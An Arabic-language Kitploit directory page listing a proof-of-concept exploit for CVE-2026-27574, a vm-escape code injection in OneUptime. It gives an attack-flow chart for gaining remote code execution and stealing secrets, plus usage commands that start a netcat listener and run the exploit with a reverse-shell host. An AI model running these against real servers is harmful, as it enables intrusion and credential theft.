Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-27574-OneUptime-RCE — إثبات مفهوم لاستغلال CVE-2026-27574، وهو حقن برمجي خطير في OneUptime يتيح تنفيذ التعليمات البرمجية عن بُعد وتسريب متغيرات البيئة. | Kitploit
أدوات/GitHubGitHub/mbanyamer/cve-2026-27574-oneuptime-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubmbanyamer/cve-2026-27574-oneuptime-rce

CVE-2026-27574-OneUptime-RCE

إثبات مفهوم لاستغلال CVE-2026-27574، وهو حقن برمجي خطير في OneUptime يتيح تنفيذ التعليمات البرمجية عن بُعد وتسريب متغيرات البيئة.

عرض المستودع
1منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-27574-OneUptime-RCE

Author Role Country Platform Vulnerability CVE CVSS Status

نظرة عامة

استغلال إثبات المفهوم (PoC) لثغرة CVE-2026-27574 – وهي ثغرة حرجة في حقن الكود (CWE-94) في OneUptime < 10.0.0 تسمح بتنفيذ JavaScript عشوائي في سياق الفحص (probe)، مما يؤدي إلى تنفيذ كود عن بُعد (RCE) كامل وتسريب متغيرات بيئية حساسة.

تم الإصلاح في: OneUptime 10.0.0 (الترحيل إلى isolated-vm)

نوع الاستغلال: عن بُعد
المصادقة: صلاحيات منخفضة (أي عضو مسجل في المشروع)
الأثر: اختراق كامل للخادم، سرقة بيانات الاعتماد، السيطرة على المجموعة

مخطط سير الهجوم

root@kitploit:~
flowchart TD
    A[Start] --> B[Open Registration]
    B --> C[Register New Account]
    C --> D[Create New Project]
    D --> E[Obtain ProjectMember Role]
    E --> F[Create Custom JavaScript Monitor]
    F --> G[Inject Malicious vm Escape Payload]
    G --> H[Probe Executes Code Every ~60s]
    H --> I[Escape vm Context via constructor chain]
    I --> J[Access process & child_process]
    J --> K[Execute System Commands]
    J --> L[Leak Environment Variables]
    K --> M[Read /etc/passwd, id, hostname, etc.]
    L --> N[Extract ONEUPTIME_SECRET, DB/Redis passwords, etc.]
    M --> O[Full RCE Achieved]
    N --> O
    O --> P[Optional: Reverse Shell / Data Exfiltration]
    P --> Q[End - System Compromised]

ميزات إثبات المفهوم هذا

  • تسجيل حساب تلقائي
  • إنشاء مشروع
  • إنشاء مراقب JavaScript خبيث
  • تسريب المتغيرات البيئية
  • إثبات أساسي لتنفيذ الأوامر
  • حمولة قشرة عكسية اختيارية (معلّقة كتعليق)

الاستخدام

root@kitploit:~
# Start listener (if using reverse shell)
nc -lvnp 4444

# Run the exploit
python3 exploit.py http://target:3002 --lhost YOUR_IP --lport 4444

المتطلبات

  • Python 3.6+
  • مكتبة requests (pip install requests)

إشعار قانوني وأخلاقي

يُقدَّم هذا الكود لأغراض تعليمية واختبارات أمنية مصرّح بها فقط.
الاستخدام غير المصرّح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها هو أمر غير قانوني وغير أخلاقي.

المراجع

  • GitHub Advisory GHSA-v264-xqh4-9xmm
  • Patch Commit

Developed by Mohammed Idrees Banyamer • Jordan • @banyamer_security

تنزيل الأداة